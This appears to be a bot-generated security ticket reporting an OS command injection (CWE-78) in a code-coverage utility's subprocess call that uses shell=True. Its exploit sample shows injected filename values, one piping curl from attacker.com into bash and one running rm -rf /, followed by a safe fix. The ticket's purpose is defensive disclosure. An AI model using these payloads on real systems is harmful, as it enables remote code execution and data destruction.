Uploaded image for project: 'AI Platform Core Components'
  1. AI Platform Core Components
  2. AIPCC-9766

[BOT][Security] CWE-78 in utils.py:93

XMLWordPrintable

    • False
    • Hide

      None

      Show
      None
    • False

      Vulnerability Details

      CWE Type(s): CWE-78 (OS Command Injection)
      Severity: CRITICAL
      Team: Unassigned

      Location

      • File: tools/code_coverage/package/oss/utils.py
      • Lines: 93

      Description

      CRITICAL command injection vulnerability through the use of subprocess with shell=True and unsanitized binary_file parameter. The code executes subprocess.check_call() with shell=True, allowing arbitrary command execution through shell metacharacters in the binary_file variable. This is one of the most dangerous subprocess patterns and can lead to complete system compromise.

      Impact

      • Arbitrary command execution with full application privileges
      • Complete system compromise through shell metacharacters (;, |, &, $, `, etc.)
      • Critical risk in automated build/CI environments
      • Potential for persistent backdoors via malicious binary paths
      • Data exfiltration and lateral movement in compromised systems

      Root Cause

      The vulnerability at line 93 uses subprocess.check_call() with shell=True parameter combined with the binary_file variable. The shell=True parameter invokes a shell to interpret the command string, and any shell metacharacters in binary_file are executed as commands. This is an extremely dangerous pattern that should never be used with untrusted input.

      Fix Status

      MR Link: Not yet created
      Fix Branch: security-fix-cwe-78-cwe78-gcc-coverage-run-python
      Status: IMPLEMENTED

      Related Exploit Files

      • test_cwe78_gcc_coverage_run_python.py

      Exploit Code Sample

      # VULNERABLE CODE (line 93):
subprocess.check_call(
    binary_file, shell=True, cwd=get_oss_binary_folder(TestType.PY)
)

# ATTACK VECTOR:
binary_file = "legitimate_test.py; curl attacker.com/backdoor.sh | bash #"
# Shell executes:
# 1. legitimate_test.py
# 2. Downloads and executes backdoor from attacker server
# 3. Everything after # is ignored as comment

# Or simpler attack:
binary_file = "test.py; rm -rf / #"
# Could destroy the entire system

# SAFE FIX:
subprocess.check_call(
    [binary_file], cwd=get_oss_binary_folder(TestType.PY)
)
# shell=True removed, binary_file wrapped in list - no shell interpretation

      References

      Generated by CI Security Bot

        1. test_cwe78_gcc_coverage_run.py
          12 kB
        2. cwe78_gcc_coverage_run_python.json
          3 kB

              Unassigned Unassigned
              pytorch-engineering PyTorch Engineering
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

                Created:
                Updated:
                Resolved: